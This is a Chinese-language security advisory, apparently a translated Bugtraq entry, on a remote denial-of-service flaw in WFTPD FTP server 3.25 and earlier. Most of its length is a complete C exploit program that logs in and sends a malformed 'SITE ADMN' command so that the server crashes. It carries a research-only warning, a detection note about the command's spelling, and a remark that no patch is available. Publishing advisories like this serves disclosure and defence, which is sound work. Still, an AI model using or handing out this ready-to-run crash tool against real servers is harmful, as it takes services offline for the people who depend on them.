WFTPD服务器SITE ADMIN命令远程拒绝服务漏洞

发布日期:2007-01-15
更新日期:2007-01-16

受影响系统:
Texas Imperial Software WFTPD <= 3.25
描述:
BUGTRAQ  ID: 22046

WFTPD是Windows平台下的FTP服务程序。

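WFTPD在处理带有超长畸形参数的SITE ADMIN命令时存在漏洞,远程攻击者可以通过发送畸形的命令导致服务器发生崩溃。注:下文测试代码实际发送的命令字为 SITE ADMN,参数仅为一个空格字符(0x20),并且是在 USER/PASS 登录交互之后才发送;该写法与本文标题中的 SITE ADMIN 不一致,排查FTP日志或编写检测规则时宜同时留意两种写法。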

<*来源:Marsu (Marsupilamipowa@hotmail.fr) *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/************************************************************************
*WFTPD server <= 3.25 SITE ADMN DoS                                     *
*                                                                       *
*Sending command SITE ADMN + \32 makes server BOOM                      *
*                                                                       *
*usage: wftpd_dos.exe ip port user pass                                 *
*                                                                       *
*Coded by Marsu <Marsupilamipowa@hotmail.fr>                            *
************************************************************************/

#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")

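/*
 * Reproduction client for the WFTPD <= 3.25 SITE ADMN crash described in the
 * advisory text, for verifying a server build in a test environment.
 *
 * Sequence on the wire: TCP connect, read the banner, send USER and PASS,
 * then send "SITE ADMN" followed by one space (0x20) and CRLF. Server replies
 * are read but never inspected, so a rejected login is not detected here.
 *
 * argv[1] = host, argv[2] = port, argv[3] = user, argv[4] = password.
 * Returns 0 once the last command has been handed to send(), 1 on a usage
 * error or on any setup/send failure.
 *
 * Changes against the published listing: the credentials are length-checked
 * before being copied into the 100-byte command buffer (the original copied
 * argv[3]/argv[4] unbounded and could overrun its own stack), the port is
 * validated, WSAStartup() is checked and no longer preceded by WSACleanup(),
 * and the socket and Winsock are released on every exit path.
 */
int main(int argc, char* argv[])
{
    struct hostent *he;
    struct sockaddr_in sock_addr;
    WSADATA wsa;
    SOCKET ftpsock = INVALID_SOCKET;
    char recvbuff[1024];
    char evilbuff[100];
    /* "USER " / "PASS " (5) + value + "\r\n" (2) + NUL (1) must fit in evilbuff */
    const size_t maxarg = sizeof(evilbuff) - 8;
    size_t userlen;
    size_t passlen;
    char *portend;
    long port;
    int rc = 1;

    if (argc!=5)
    {
        printf("[+] Usage: %s <ip> <port> <user> <pass>\n",argv[0]);
        return 1;
    }

    /* Refuse credentials that would not fit the fixed-size command buffer. */
    userlen = strlen(argv[3]);
    passlen = strlen(argv[4]);
    if (userlen > maxarg || passlen > maxarg) {
        printf("[-] <user> and <pass> must not exceed %u characters\n",(unsigned)maxarg);
        return 1;
    }

    /* atoi() would silently turn garbage into port 0; parse strictly instead. */
    port = strtol(argv[2], &portend, 10);
    if (portend == argv[2] || *portend != '\0' || port < 1 || port > 65535) {
        printf("[-] Invalid port: %s\n",argv[2]);
        return 1;
    }

    if (WSAStartup(MAKEWORD(2,0),&wsa) != 0) {
        printf("[-] WSAStartup failed\n");
        return 1;
    }

    printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
    if ((he=gethostbyname(argv[1])) == NULL) {
        printf("Failed\n[-] Could not init gethostbyname\n");
        goto out;
    }
    if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
        printf("Failed\n[-] Socket error\n");
        goto out;
    }

    memset(&sock_addr, 0, sizeof(sock_addr));
    sock_addr.sin_family = AF_INET;
    sock_addr.sin_port = htons((unsigned short)port);
    sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
    if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(sock_addr)) == SOCKET_ERROR) {
        printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
        goto out;
    }
    printf("OK\n");

    /* Banner: consumed so the exchange stays in step; content is not used. */
    memset(recvbuff,'\0',sizeof(recvbuff));
    recv(ftpsock, recvbuff, sizeof(recvbuff), 0);

    memset(evilbuff,'\0',sizeof(evilbuff));
    memcpy(evilbuff,"USER ",5);
    memcpy(evilbuff+5,argv[3],userlen);
    memcpy(evilbuff+5+userlen,"\r\n\0",3);
    printf("[+] Sending USER ... ");
    if (send(ftpsock,evilbuff,(int)strlen(evilbuff),0)==SOCKET_ERROR) {
        printf("Failed\n[-] Could not send\n");
        goto out;
    }
    printf("OK\n");
    memset(recvbuff,'\0',sizeof(recvbuff));
    recv(ftpsock, recvbuff, sizeof(recvbuff), 0);

    memset(evilbuff,'\0',sizeof(evilbuff));
    memcpy(evilbuff,"PASS ",5);
    memcpy(evilbuff+5,argv[4],passlen);
    memcpy(evilbuff+5+passlen,"\r\n\0",3);

    printf("[+] Sending PASS ... ");
    if (send(ftpsock,evilbuff,(int)strlen(evilbuff),0)==SOCKET_ERROR) {
        printf("Failed\n[-] Could not send\n");
        goto out;
    }
    printf("OK\n");
    recv(ftpsock, recvbuff, sizeof(recvbuff), 0);

    /* Request under test: "SITE ADMN", a single space (0x20) as argument, CRLF. */
    memset(evilbuff,'\0',sizeof(evilbuff));
    memcpy(evilbuff,"SITE ADMN ",10);
    memset(evilbuff+10,32,1);
    memcpy(evilbuff+10+1,"\r\n\0",3);

    printf("[+] Sending SITE ADMN ... ");
    if (send(ftpsock,evilbuff,(int)strlen(evilbuff),0)==SOCKET_ERROR) {
        printf("Failed\n[-] Could not send\n");
        goto out;
    }
    printf("OK\n");

    /* Nothing below confirms the server state; this only reports the send. */
    printf("[+] Host should be down\n");
    rc = 0;

out:
    if (ftpsock != INVALID_SOCKET)
        closesocket(ftpsock);
    WSACleanup();
    return rc;
}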

建议:
厂商补丁:

Texas Imperial Software
-----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.wftpd.com/

本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载